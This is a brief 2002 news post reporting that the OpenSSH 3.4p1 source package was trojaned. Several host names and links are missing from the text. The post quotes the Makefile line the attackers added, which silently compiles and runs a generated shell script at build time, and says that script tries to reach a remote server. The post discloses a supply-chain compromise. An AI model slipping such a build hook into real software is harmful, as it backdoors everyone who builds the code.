Trojan found in OpenSSH 3.4p1
Posted on: 08/01/2002 10:59 AM

It seems like that the OpenSSH package on was trojaned. Thanks Palos.

"The changed files are openssh-3.4p1/openbsd-compat/
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on ("

Read more

Printed from Linux Compatible (